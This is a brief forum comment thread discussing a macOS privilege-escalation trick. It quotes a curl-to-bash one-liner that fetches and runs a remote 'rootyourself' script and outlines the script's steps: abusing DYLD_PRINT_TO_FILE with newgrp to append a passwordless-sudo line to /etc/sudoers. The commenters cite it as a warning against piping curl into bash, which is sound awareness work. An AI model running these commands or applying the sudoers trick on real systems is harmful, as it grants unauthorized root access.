2 comments

[ 3.1 ms ] story [ 11.5 ms ] thread
There was an earlier discussion here: https://news.ycombinator.com/item?id=9934428

I think it was flagged because it used some social media tracking URL instead of the original...

Here's my post from that thread:

I like to think of this as a good example of why not to use curl to execute bash scripts.

  curl -s https://raw.githubusercontent.com/nchelluri/rootyourself/master/doh.sh | bash
anyone has any explanation?

apparently it

   1. sets `DYLD_PRINT_TO_FILE=/etc/sudoers` on the env,
   2. run `newgrp`
   3. and pass in `'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'` as input to it.
everything seems innocuous and properly escaped as to not trigger anything bad...